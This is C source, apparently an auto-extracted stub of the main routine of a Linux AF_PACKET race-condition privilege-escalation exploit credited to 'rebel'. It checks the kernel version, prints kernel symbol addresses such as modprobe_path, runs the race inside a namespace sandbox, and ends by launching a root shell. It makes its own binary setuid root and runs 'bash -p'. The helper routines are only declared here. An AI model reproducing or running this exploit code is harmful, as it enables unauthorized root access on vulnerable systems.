
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct utsname {int dummy; } ;


 int KERNEL_BASE ;
 int MODPROBE_PATH ;
 int PROC_DOSTRING ;
 int REGISTER_SYSCTL_TABLE ;
 int SET_MEMORY_RW ;
 int check_procs () ;
 int chmod (char*,int) ;
 int chown (char*,int ,int ) ;
 int detect_versions () ;
 int dprintf (char*,...) ;
 int execl (char*,char*,char*,int *) ;
 int exit (int ) ;
 int fork () ;
 int get_kernel_addr () ;
 scalar_t__ geteuid () ;
 scalar_t__ getuid () ;
 int launch_rootshell () ;
 int setresgid (int ,int ,int ) ;
 int setresuid (int ,int ,int ) ;
 int setup_sandbox () ;
 int waitpid (int,int*,int ) ;
 int wrapper () ;

int main(int argc, char **argv)
{
    int status, pid;
    struct utsname u;
    char buf[512], *f;

    if (getuid() == 0 && geteuid() == 0) {
        chown("/proc/self/exe", 0, 0);
        chmod("/proc/self/exe", 06755);
        exit(0);
    }

    if (getuid() != 0 && geteuid() == 0) {
        setresuid(0, 0, 0);
        setresgid(0, 0, 0);
        execl("/bin/bash", "bash", "-p", ((void*)0));
        exit(0);
    }

    dprintf("linux AF_PACKET race condition exploit by rebel\n");

    dprintf("[.] starting\n");

    dprintf("[.] checking hardware\n");
    check_procs();
    dprintf("[~] done, hardware looks good\n");

    dprintf("[.] checking kernel version\n");
    detect_versions();
    dprintf("[~] done, version looks good\n");







    dprintf("[.] proc_dostring:         %lx\n", PROC_DOSTRING);
    dprintf("[.] modprobe_path:         %lx\n", MODPROBE_PATH);
    dprintf("[.] register_sysctl_table: %lx\n", REGISTER_SYSCTL_TABLE);
    dprintf("[.] set_memory_rw:         %lx\n", SET_MEMORY_RW);

    pid = fork();
    if (pid == 0) {
        dprintf("[.] setting up namespace sandbox\n");
        setup_sandbox();
        dprintf("[~] done, namespace sandbox set up\n");
        wrapper();
        exit(0);
    }

    waitpid(pid, &status, 0);

    launch_rootshell();
    return 0;
}
